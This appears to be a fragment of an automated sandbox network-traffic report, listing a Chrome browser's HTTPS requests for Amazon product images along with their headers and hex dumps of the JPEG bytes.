                                                                                                                                                                                                                                                                Data Ascii: 6jV3Mgvw;Xmn6X"O8xcmZh}_c]`w{g}*/y^FF'x9Tf!wA>R{q,4uw+bR;(h\
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: c9 cc df 44 0c db d6 e6 b5 65 3d 0f df ce de fa 7c e9 fe 9d 3d 5c b4 c3 30 59 1c 6a ec 36 31 7f 43 bd 44 4d 8a cf c3 f4 00 00 00 6c 5c ab c3 97 e6 4b b4 f4 e2 04 c8 f0 00 00 00 2d dd e0 6b e6 9f 59 f8 2b 3e 5e df 67 0b 73 8f 4d 48 e7 a4 1f 77 e3 b3 0a bf 96 48 ef e3 8f f8 f3 f9 5c fe 72 f7 f0 bb b9 ed 96 fe 4f b6 3b 74 a5 3b f8 3c db 74 33 d3 ca ed 3f a8 dd 71 c9 bd a3 b2 6e 09 4e c1 f9 03 db c0 01 e1 cb f7 d3 af 97 97 60 00 00 01 b8 f3 da 38 64 ec bd 64 47 56 aa e6 30 00 00 03 95 37 d3 ad b3 20 f1 9d c7 95 ec ca bf b7 9d 47 bf 15 17 6c 57 df a6 8b 7a 75 fb be af 19 23 cb 76 65 97 7b 5b f4 8f a3 cb c3 95 47 cb bd dd 6c d5 bc 21 8e 78 a4 c6 fc a5 fc e3 f7 b1 af 69 65 89 79 8f ae dd 6e ca 4b b7 e4 f6 fd e0 00 00 00 00 00 01 22 bb 54 87 39 67 36 58 11 2d a4
                                                                                                                                                                                                                                                                Data Ascii: De=|=\0Yj61CDMl\K-kY+>^gsMHwH\rO;t;<t3?qnN`8ddGV07 GlWzu#ve{[Gl!xieynK"T9g6X-
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: d4 00 00 00 00 00 00 00 00 00 00 e1 66 e9 a0 f5 7f 40 ab c7 7f d9 f3 f8 f5 e7 9e 7a cd 36 72 69 7f 7c 6d 7d bf 2f 6d b6 cd 6f 90 2b 86 91 d5 4d 06 ad c7 2d c9 44 9a 0a 67 dd 7f f4 ed 05 95 4f 83 e3 ed c7 49 14 4a a4 7d 7d 7f 3c 5e 54 3e 3f a7 af 3d b2 db 55 be 61 6b 54 cc 87 d7 b7 46 f4 7a 88 00 00 00 00 00 00 00 00 00 03 9a 7a dd 33 07 7a 74 99 3a 6f db 87 fd 3a 69 2f d3 e1 b1 9e 3e b9 77 a7 6d 3d f7 f2 92 6f 8f e8 d5 5f a3 ca ad c2 62 a9 df 6f 30 b5 ba 66 f9 fc 9e fe 1c f1 24 9f 17 d5 af 9e de 7a bd ef e3 84 3d 3a 67 cf 1f 5d 25 fa bc 24 53 e3 fa 25 c3 e0 fa c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1f ff c4 00 53
                                                                                                                                                                                                                                                                Data Ascii: f@z6ri|m}/mo+M-DgOIJ}}<^T>?=UakTFzz3zt:o:i/>wm=o_bo0f$z=:g]%$S%S
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 03 6c c7 d4 36 80 3f 4c 68 06 1e 61 cf e9 c1 71 f7 0f ab 05 e7 83 76 9f 5e dd 7b 7e ec 51 c3 5b 04 11 36 ca 96 db a3 14 aa 51 0c dd 58 a7 2a 36 58 ae 13 45 c1 db 83 8f 19 25 4e 82 84 55 23 6c a8 98 ea 53 46 bf 24 83 62 ac 5e 47 0e 4b 13 c7 11 02 80 98 c3 a1 4b cc 46 5a 40 64 1d 09 c3 e2 53 e4 81 7c 7d 00 c0 00 25 03 07 3d 0b c1 32 02 87 bc d1 04 cb 83 9d 00 26 c1 7d 5d 80 22 1e a0 c0 0e 9c 83 90 60 17 54 39 ed 60 ae 43 d6 5d 3e a8 82 89 9f 4e c0 e5 a6 cf df b5 cb 90 ed 88 75 0d d5 d3 91 ba be 26 6d 98 9d 3d 98 27 d3 53 14 89 60 54 50 07 a8 90 88 80 e3 53 89 7a c4 12 8e 04 74 ec 2e 00 da 8e 98 d7 4e de 41 de 20 e0 43 5d af a0 47 9e 39 00 8e 22 50 07 62 44 78 a4 9a 17 dd 4c 2e 32 3d 1e 1f 2d 2b 49 81 76 03 76 73 6c f8 f1 32 03 1e e8 0e 3f 12 a7 25 ca 02 06
                                                                                                                                                                                                                                                                Data Ascii: l6?Lhaqv^{~Q[6QX*6XE%NU#lSF$b^GKKFZ@dS|}%=2&}]"`T9`C]>Nu&m='S`TPSzt.NA C]G9"PbDxL.2=-+Ivvsl2?%
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 65 f2 e1 f3 76 cd ca b4 34 ab a5 63 c4 90 b9 ef 7a 52 03 7e 45 1b 20 0c 10 45 a2 08 a4 26 32 69 98 fc 8e 20 1b 61 e5 ab 8e b7 ec 77 22 3d 76 a3 a7 7e c6 e7 7d 20 29 80 f5 5b 00 17 c9 97 91 43 d5 a6 98 bf 42 ca d8 e0 0b 09 12 54 4c 67 2e 51 3b fc 05 21 77 70 2d 61 de be 6a d4 52 74 ab 97 02 5c be a8 f4 4c 4c 2a d1 82 e9 a4 36 f3 83 51 04 50 6a 82 4d 5a a2 46 cd 5b 14 08 d9 b4 a3 bd c0 02 61 cc c3 cf 48 f7 49 20 d0 a5 5f 42 ac 73 18 c7 2e 79 ac dd ee 58 58 5b 26 3b 4a ed b6 36 e6 06 bf 03 6f 6a 57 6b 38 9f 93 7a c5 34 92 7c a4 6b a8 14 2e b5 08 1a e5 72 2a 35 ab 59 98 c5 5d 4e 79 0b 65 e6 37 2f a6 e4 22 12 2c c0 96 61 b2 72 2f d2 59 2a 66 60 bf 66 9b f9 1b 42 cf e6 dd ba 85 66 ea 7b 20 6a f3 32 6d 9f b6 90 73 0e dd 24 da 26 e6 37 cb d7 1c ee 64 01 31 1e ab
                                                                                                                                                                                                                                                                Data Ascii: ev4czR~E E&2i aw"=v~} )[CBTLg.Q;!wp-ajRt\LL*6QPjMZF[aHI _Bs.yXX[&;J6ojWk8z4|k.r*5Y]Nye7/",ar/Y*f`fBf{ j2ms$&7d1
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 32 40 db 53 ae 07 98 69 14 c8 30 fd 65 09 95 96 33 80 0e df 0b 6d d9 c4 c8 ff 00 b0 b2 81 ff 00 92 21 8b 22 4d de 4c 54 59 3b 44 ae 5a 38 7b 10 93 96 f1 71 51 91 2c d2 61 18 c1 26 0c 9a 94 a4 6e d9 5e 5d 98 15 7f 06 37 9f 87 1b cf c3 80 57 f0 60 86 13 0e bf f2 02 10 51 0e a8 7a b1 30 44 91 7c b1 53 28 26 42 e8 22 19 8b 9b 02 f1 d3 ca ed 69 c6 c4 5b 22 9f a7 e7 72 79 ac 95 ed 84 ce 58 22 f5 b5 6a 02 69 23 3e b3 bf b4 d4 1b f7 3d ce d7 ed 90 92 49 5d 13 93 4d cb 17 35 7c 97 6c 47 39 8a c9 75 63 40 63 64 db 49 ae d9 0c c9 cb 70 96 13 d8 ab ec ca a4 a2 68 ee 64 a1 f2 b7 37 5e 54 1d 16 b1 63 51 59 0a c1 54 dd 31 78 82 e8 b9 45 37 0d d5 2a e8 2c 1a a4 b7 96 88 1d 99 36 63 f8 c0 31 25 fb c1 f7 f3 54 f2 96 05 03 a7 26 47 e9 74 e3 91 94 c4 71 fe 13 67 cf e7 e3 22
                                                                                                                                                                                                                                                                Data Ascii: 2@Si0e3m!"MLTY;DZ8{qQ,a&n^]7W`Qz0D|S(&B"i["ryX"ji#>=I]M5|lG9uc@cdIphd7^TcQYT1xE7*,6c1%T&Gtqg"
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 80 e1 b3 22 37 d9 dd a8 e0 e0 42 09 0b 8d 83 14 fe bc 19 40 29 80 87 48 c7 da 1d 00 c7 72 80 97 aa d1 73 f5 76 83 12 cb 94 e8 86 ac 16 0d e1 75 2e 27 54 da 54 36 1b a8 98 88 f9 d4 db 2a 16 2a fc 74 a1 0f aa a7 4c 08 f9 37 0a 06 a3 81 53 1b cc 6f 30 0a 7d f8 45 4c 19 d1 08 96 a6 1d 0a 98 6a 61 5f 61 75 d7 5c 4b cd 63 08 8e 33 09 ce fa c5 7b 7a 98 6d 14 cf 0c dd 30 cb b8 fe 94 b1 c6 a6 21 d4 22 80 a1 c5 d6 5b 57 a7 cc b3 97 90 08 2c ab ad ae 21 7a b5 0a 32 b2 ec ee a2 a2 d3 64 b2 c5 02 2e b8 76 07 8b a0 79 4a a2 5c 9e 2d f4 ec 94 31 61 47 7b 18 a0 fa d1 12 9c 3c 9a 89 ed 86 9b 42 5c 20 d5 66 e6 3e cb c3 a8 53 ff 00 86 00 a0 0f cc 1c 01 d4 fa a4 1c 02 ea 07 61 09 8e 31 6e c1 2e b8 76 81 dd 00 86 c9 13 d7 12 74 4e 90 da f7 ee c6 d7 aa ad 5c 9b a7 3a 3a b1 d2
                                                                                                                                                                                                                                                                Data Ascii: "7B@)Hrsvu.'TT6**tL7So0}ELja_au\Kc3{zm0!"[W,!z2d.vyJ\-1aG{<B\ f>Sa1n.vtN\::
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 5e 06 5f e6 dd 3d 2a ac 44 6c cc 97 45 48 44 37 4d ba a9 66 c5 be 12 c7 6c 8e 9a ad ac 75 81 82 09 10 ee 3c 4a d3 3d eb 93 3b 30 75 1b 79 9e 2c 8b 30 7c d1 56 e3 e7 0f 34 c4 c5 31 0c 62 18 36 4c 5e 46 0e f6 ba 76 f2 c2 a9 24 ba 67 45 74 ca b2 4a 72 51 2c f1 ac 57 ab 52 d0 cb c0 a2 58 f5 e4 88 b1 df 30 94 55 e2 f9 55 22 bc 88 69 20 b5 7d 53 3e 0e e7 11 0e 8f b4 97 5e b0 2c db 52 e7 6d d2 52 ab 0f 18 ca 19 61 66 f6 70 eb 01 9f 57 32 7c d2 70 f1 93 52 57 39 30 95 92 41 37 02 ae 4a 23 c3 e6 64 d3 7d f0 b8 dc 37 7a 4e 23 37 fe 56 2b 5f cb 8e ef 77 45 fe e0 af fe 70 f8 cb e1 01 a3 54 b4 1d 7e 0f 6b 8c f3 f9 46 ad fe 49 9e 33 b7 e4 e6 67 fd f6 98 c8 bf 93 e6 5f 98 73 8c f3 f9 46 ad fe 49 9e 3b a1 18 2e e2 a7 1c f5 22 ed 27 1c f0 bc 56 32 9e 7a 3e 5e 91 06 93 77
                                                                                                                                                                                                                                                                Data Ascii: ^_=*DlEHD7Mflu<J=;0uy,0|V41b6L^Fv$gEtJrQ,WRX0UU"i }S>^,RmRafpW2|pRW90A7J#d}7zN#7V+_wEpT~kFI3g_sFI;."'V2z>^w
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 84 74 e0 ad 92 06 ae 08 ed b3 77 49 6b ba 72 42 a8 9f 8e e0 ca 91 05 8e 82 7b e5 88 43 0a 28 e4 f5 c3 32 ad 2b d9 09 7c ad f4 22 2c 4e 4e 8e 5b fc 82 db 60 8b ab 77 51 bb 9f 9a 5c 5b 45 c7 1d b0 bb 5d a7 74 1e 55 be 76 d5 93 69 e5 0e e5 e2 84 49 b9 3b a5 be 4a a4 bf 34 cf 19 26 a1 11 ca 4a 7a aa 9c 13 49 26 aa 19 43 b1 bf e6 c6 70 ce cb 23 96 cf 5b d4 aa 90 c7 d9 e9 7a 86 61 66 0d 5b 31 9a 65 96 67 38 6f 2e 79 72 6d 43 cf 66 f6 6d 4f c0 cf c5 65 fd 05 99 1e db e5 b7 62 a3 8a d4 17 74 7c 7c c4 4b c9 eb 64 5c bc 32 8b a1 d3 51 9d d3 0b e6 00 2c d5 0b 01 9a 16 a2 ab e5 8d 5a 4b 2b 51 ce 42 3b 68 6b bb b6 2b 55 f8 10 e0 53 6b 9c f9 9a e2 f9 7f a7 c2 43 12 d0 f5 9b 97 e8 56 5a d6 6c 19 85 4d ab dc 6c d9 c8 e1 35 13 8e d8 5a 2d 18 09 ee e8 5c d8 41 cd 8e b1 2e
                                                                                                                                                                                                                                                                Data Ascii: twIkrB{C(2+|",NN[`wQ\[E]tUviI;J4&JzI&Cp#[zaf[1eg8o.yrmCfmOebt||Kd\2Q,ZK+QB;hk+USkCVZlMl5Z-\A.


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                94192.168.2.449966151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC678OUTGET /images/G/39/UAE-hq/2022/img/Events/XCM_Manual_1463368_4956629_400x400_2X._CB609908562_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC652INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 24841
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: ffc89087-fd92-40e3-bcb5-5a38e7f44867
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 19 Sep 2022 08:03:02 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Sat, 13 Feb 2044 09:15:56 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:34 GMT
                                                                                                                                                                                                                                                                Age: 1642318
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000044-IAD, cache-ewr18138-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 06 04 04 04 05 04 06 05 05 06 09 06 05 06 09 0b 08 06 06 08 0b 0c 0a 0a 0b 0a 0a 0c 10 0c 0c 0c 0c 0c 0c 10 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 07 07 07 0d 0c 0d 18 10 10 18 14 0e 0e 0e 14 14 0e 0e 0e 0e 14 11 0c 0c 0c 0c 0c 11 11 0c 0c 0c 0c 0c 0c 11 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c2 00 11 08 01 90 01 90 03 01 11 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 05 06 03 04 07 02 01 08 01 01 00 01 05 01 00 00 00 00 00 00 00 00 00 00 00 00 05 01 02 03 04 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fd 52 00 00 00 00 00 00 01 af ad 97 47
                                                                                                                                                                                                                                                                Data Ascii: JFIF5RG
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: d3 a8 5b 9a cb 6e 7e 7d 93 4a 36 ed 45 33 f4 9c 72 37 3e 0f 7c a8 00 00 00 03 dd f6 df 7b ee 6b 47 47 62 9b c6 4f 80 00 00 00 07 0b f4 6e 42 4b 77 57 47 36 3c f0 92 7d a7 81 ea 87 e7 1e fb 96 cb 2f 1f 75 a3 6f 4f 3f 49 f3 7e c8 08 9e 8a 1f 94 74 dc f4 d5 d8 ab da 3d 06 1d 8c 72 f4 bf 4e ec 71 68 ef d0 7e 75 da 00 00 00 00 00 b9 76 70 1a 5a 5b 15 ae 66 5c 00 00 00 00 38 5f a4 71 f3 1b 7a d1 79 b1 d8 b9 59 ee 9d c8 4f 8e 2b d7 c0 57 7a 78 4b c5 1b 91 9b 9d 23 cf 7a e0 2b 73 d1 14 6e af 9b d3 59 23 64 85 de c9 ba 15 f1 55 2a e0 92 b6 9d db ce 7b 0f 75 00 00 00 00 05 97 a6 88 d4 d3 cf 0b 0b 20 00 00 00 00 1c 33 d2 b8 c9 4d bc 11 19 ac bf 70 fd 2d e3 9c 98 1c 8f a9 85 aa f5 bc f5 ba 95 de 8b dd e9 5e 7d d6 8d 7a 29 b3 71 b5 ae bf 92 9d b6 4e a3 7c 47 9b b5 f1
                                                                                                                                                                                                                                                                Data Ascii: [n~}J6E3r7>|{kGGbOnBKwWG6<}/uoO?I~t=rNqh~uvpZ[f\8_qzyYO+WzxK#z+snY#dU*{u 3Mp-^}z)qN|G
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 30 dd 4e 39 d1 c4 ea 64 b7 b1 f3 92 df 9b 3b 5e 7b a5 c2 48 58 f4 b6 21 76 b0 de 22 b7 79 6c f4 67 6a e6 66 05 1a 53 4b 5a fb 68 12 fa 5d 2e 12 43 98 ce 47 7e 84 e4 27 40 00 4d 4d 47 d9 fa 98 70 06 b6 b6 6a 47 0d d0 fc a5 40 03 f3 df 5f 05 fa 13 90 9d fc f9 d7 c1 74 88 59 0c 57 52 85 2d a5 68 d0 d8 b5 68 6d 72 d9 e8 cb 46 86 cc 0e de 1b 94 6e dd 0e 5b 4b be f2 53 63 9c 4c c7 d4 e4 35 a0 76 f0 76 ae 62 63 9b 4d c7 77 0e 5e 66 93 27 a7 0b b5 86 73 53 3d 77 77 5f ab 40 49 8e 05 d6 42 77 be 4e 6f 53 25 95 5d fd 6a 1c b6 97 73 e5 a6 40 03 ed 69 77 ee 79 ed 9d 9c 20 01 5a e6 25 e0 e0 e4 40 02 9b 25 a9 44 95 d2 b7 47 6d 58 35 33 f8 aa 03 6f 05 d2 33 6f 93 74 11 9b 56 5d d4 20 a4 79 37 41 19 64 d2 d8 1d 06 23 78 73 f9 7d 1b fc 46 f4 3e c6 28 6d 9c 34 59 5d 2c b4
                                                                                                                                                                                                                                                                Data Ascii: 0N9d;^{HX!v"ylgjfSKZh].CG~'@MMGpjG@_tYWR-hhmrFn[KScL5vvbcMw^f'sS=ww_@IBwNoS%]js@iwy Z%@%DGmX53o3otV] y7Ad#xs}F>(m4Y],
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 10 0c 60 2e 59 11 55 68 47 89 12 52 56 41 59 13 26 a1 55 30 20 92 66 11 10 57 a8 40 a2 43 01 b1 25 4e 45 40 13 d7 2a 99 4a 73 0e af 93 81 96 f5 a4 fd 5d 6f 26 49 fa 6c 9b 19 53 2c aa 8b 2a 65 54 f6 ef cb 77 34 79 f5 02 31 a9 8d cf 51 63 55 e9 01 07 4c 8e 50 e9 01 11 ea fc 20 dc 55 48 44 40 0a 2e 3b cc 4c e4 30 70 62 a4 2a 10 a0 43 32 13 09 44 a4 44 c0 60 ef 35 50 ff 00 d1 0c cb f2 88 aa a2 2a 95 54 e3 5f a6 f5 b1 55 2f b6 63 14 a5 13 1a 5a 44 cf 5d 09 c3 c8 d8 24 39 e8 b6 02 92 19 a9 4f c0 01 1b 14 4b d4 2f 5a 97 a0 c6 c7 68 8a 60 50 ca 53 14 65 ad b1 d1 ee 36 4c 04 6c 3d fd e3 58 b6 ca 2a 27 1e 21 d9 82 a9 f5 18 63 13 31 0c 51 2b 00 15 4d d7 ae 92 2a 75 16 65 2f ca 44 c8 19 93 a0 38 94 c5 31 40 c5 f6 ac b2 3d da 40 cd 3f 26 c0 80 2f 03 24 80 d7 48 02 8a
                                                                                                                                                                                                                                                                Data Ascii: `.YUhGRVAY&U0 fW@C%NE@*Js]o&IlS,*eTw4y1QcULP UHD@.;L0pb*C2DD`5P*T_U/cZD]$9OK/Zh`PSe6Ll=X*'!c1Q+M*ue/D81@=@?&/$H
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: c0 00 8b 56 a7 4f 93 aa ca 3c 80 00 0e e3 60 0e 5e 15 5e 26 b6 97 3d cc ad 5e be f1 e2 0f 0c bd 6a 35 67 85 76 ea 10 0b 1c 87 ab b1 64 aa aa 08 0a 91 1f a0 7f 36 be 7e 99 54 83 26 0d d5 26 e4 7c eb 49 85 b5 c2 75 12 f8 80 8a 7c 19 ca e2 65 78 0d 3e 80 a7 53 3a 83 d9 bd 91 38 c6 c0 ae 46 22 52 ff 00 18 13 91 3f 59 f8 d6 0a 95 7b 4a e6 ed 9e fe a6 4c 65 f4 c2 fe 96 39 c7 3f 01 c7 7f 5c 5b eb 87 f8 e3 5f 8e 47 7d 32 23 f4 0f e6 c3 9b a6 4d b0 e4 90 f3 22 e7 ce d8 4a 95 1d 89 32 07 1e f8 b9 d4 7e 79 1d 72 81 50 a4 c4 a6 1d 9b c8 c5 2d 66 30 e2 82 fd 47 12 e3 65 44 7d d9 a7 53 ea 95 96 58 7b 27 bf a9 93 19 7d 30 bf a5 8e 71 cf c0 71 df d7 16 fa e1 fe 38 d7 e3 91 df 4c 88 fe 5c fe 6c 68 f1 22 db 24 83 fe 60 e7 ce db 8d 0a 5d 80 ec 45 10 03 10 40 53 28 02 e4 11
                                                                                                                                                                                                                                                                Data Ascii: VO<`^^&=^j5gvd6~T&&|Iu|ex>S:8F"R?Y{JLe9?\[_G}2#M"J2~yrP-f0GeD}SX{'}0qq8L\lh"$`]E@S(
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: af 36 2c 6a 71 3b 5e dc e6 b3 52 51 d3 3a 1e 98 69 63 84 4e 76 c1 7f aa 9a b1 72 8b 8c 0d af 6e 73 59 a9 2a e9 9d 17 4d c7 d8 20 d3 9e b2 6b f5 a4 29 db 4d cd 2f 37 8b 87 4d b6 54 2b 96 8d b4 cd 85 dc e3 4b 04 f6 3d 78 dd 93 35 de 38 d2 ad 9c 4e db 27 6e 2f 20 c7 ec 56 ed 71 1c 36 4f ed d9 5c d6 fb 1b ec 5a af d4 ca de f9 f1 a9 e6 31 39 b9 ff 00 6d 66 33 d1 e3 fb 29 ee 5c 5a 24 ee a7 32 d9 5f 47 07 4a 89 67 5a 0f 66 e3 b4 f8 15 39 74 d1 d2 35 7f 07 a8 11 f2 db 1b d7 2a bb 71 0b 22 a6 dc da e8 ad 01 ce 69 87 68 2b b4 1f 2a cf da ac b2 ef 5c 99 c9 bd 89 16 65 76 cd 44 44 c5 31 0c 25 37 b2 ba a9 41 ef c3 38 90 cd 90 e1 bc f6 df 8f 64 c3 76 fe dc c8 e6 8b fd bd 6d 9b cf f7 1e 1f 3d 21 da 2a a5 5a 3d c9 35 64 93 57 f4 28 73 37 de 62 03 b1 e2 00 3d 21 da 2c a5
                                                                                                                                                                                                                                                                Data Ascii: 6,jq;^RQ:icNvrnsY*M k)M/7MT+K=x58N'n/ Vq6O\Z19mf3)\Z$2_GJgZf9t5*q"ih+*\evDD1%7A8dvm=!*Z=5dW(s7b=!,
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 7f 5e 29 bd 2a df c0 8c 67 8f eb 2d c7 e8 df 13 a3 13 c1 6f 63 ea 3a ff 00 51 e8 07 13 89 37 ae 3c 58 f5 fb f8 62 35 88 75 9e 53 7b b1 33 b8 3e 2d ec 3d 43 4f 0b 33 a0 1e 2d ee 3d 47 4c 46 b2 8e b1 c9 6f 76 24 dd 39 f1 64 d3 ef e1 8d 41 e0 7e 7a c1 10 71 66 36 18 4d eb 79 6d a2 fa b8 9c 4a 4a f9 03 45 f5 0f 99 ca 42 f9 07 55 f5 1c 26 e9 bc b5 d5 7d 5c 46 18 3a 1e 0c a6 e3 e7 3a 01 c4 e0 09 a4 f2 bc 41 fe ec 48 5c f4 0e 81 e6 1f 37 90 a1 e9 1d 07 ce 30 04 32 79 5e 21 ff 00 6e 35 07 81 f9 b3 58 9e 6a 0d 58 f9 86 0e ee 0e 88 d7 a7 eb 1e 9e eb 05 51 c5 89 b0 1e bc 6d 9a 28 7b 1e a2 20 7d 59 af 8d ad 14 c0 1b 13 00 79 86 bd b1 ab 62 aa 56 04 90 08 a6 a8 d6 dc 7f 27 89 65 3b f0 5a 15 68 64 47 74 52 41 74 47 0a ec 97 53 cb 55 cb 87 93 34 84 2c 63 76 dc a6 6e 6a
                                                                                                                                                                                                                                                                Data Ascii: ^)*g-oc:Q7<Xb5uS{3>-=CO3-=GLFov$9dA~zqf6MymJJEBU&}\F::AH\702y^!n5XjXQm({ }YybV'e;ZhdGtRAtGSU4,cvnj
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 4d 8f 46 0e 80 1d 0e ba 8e 18 16 04 66 00 f4 f4 9c 73 14 df d2 30 a1 02 4d 56 a0 0e 16 ef a9 48 3f 7f cd 0e 57 43 75 23 1a 38 d2 45 ea 6f 00 6c a0 5c 93 d0 06 3f 14 9c 98 97 b3 af d3 e0 45 d8 ec fa 9d 3c d1 31 c2 eb eb e8 c6 84 00 13 87 1c 68 da 8b 8b 93 81 6d 3a 4f 5e b7 3d 38 89 67 a4 77 71 55 0c 8a 19 1e 24 86 47 60 ca 74 28 ec 15 5a fe 56 28 a2 a0 a3 5a 4a 4a a8 a9 e9 91 62 8f 33 99 51 dd 55 6c 06 6d df 2a de 4e 05 c8 ea d6 d7 ea c0 ea d7 4b 80 7b 30 2d 6b 37 41 d3 5c 28 d3 8d bf eb 5d 31 c3 3c e7 d7 3b 9f 9a fe 29 f9 32 af 67 5f a3 06 ea 45 c1 1d 20 fc 73 cb 90 5e 52 3a 17 a0 7a 7c 11 b0 96 92 78 c9 b5 ed 9a 36 17 b7 a7 16 5b a0 be bd 43 8e 08 e4 da da e3 81 bd ad 7d 7f ea f8 d3 4b 95 1d 43 41 af 56 07 26 8e 90 8b fd 39 e4 00 1f 66 39 31 a7 7e 6c d9
                                                                                                                                                                                                                                                                Data Ascii: MFfs0MVH?WCu#8Eol\?E<1hm:O^=8gwqU$G`t(ZV(ZJJb3QUlm*NK{0-k7A\(]1<;)2g_E s^R:z|x6[C}KCAV&9f91~l
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 60 b7 50 14 b2 c6 b1 f9 0e be 37 27 1f 08 b6 dd 46 d0 aa 8e 48 a5 a9 aa 86 39 73 47 3f e3 a3 65 07 2b c4 fc 37 4d f2 49 e2 a6 36 fd 7f 79 53 67 34 d4 a2 95 52 30 59 6c ad 2a 03 69 5a 33 aa e6 c5 45 54 f4 55 09 04 72 d0 0a 78 80 63 02 e5 ce ac 4e 60 ef af 2b c5 c5 30 a1 a2 89 05 3a ce e0 09 56 26 b0 dc c4 6d 75 cd 60 32 af 3b 1d 3e 17 9c 8c 18 7a 0d f1 aa b0 04 1e c3 ae 38 b8 08 3e d1 b1 fb bc 31 cc c6 ac 8e 3d 0b 1a 28 fb 86 2f 94 db 87 56 0f 1b eb fc 30 b7 8a 8a 91 f3 3f 54 93 c8 aa b6 fb 31 cd dd 1c 8a ea 5a 6a b3 d4 48 0d 01 f5 77 ba e3 5b 8b f1 b6 35 eb 03 06 f2 2d 4c 52 29 e1 a4 6c 24 b7 e8 fc 42 b1 43 59 1c 90 ad 5b 30 8f 75 31 28 f0 80 e7 94 0c 92 22 af 23 1b 5e a6 29 0c c6 9e be 85 a6 74 82 4a 88 1a d2 73 8b 22 19 62 0c ec 99 57 e5 23 7f 2b 1b 46
                                                                                                                                                                                                                                                                Data Ascii: `P7'FH9sG?e+7MI6ySg4R0Yl*iZ3ETUrxcN`+0:V&mu`2;>z8>1=(/V0?T1ZjHw[5-LR)l$BCY[0u1("#^)tJs"bW#+F
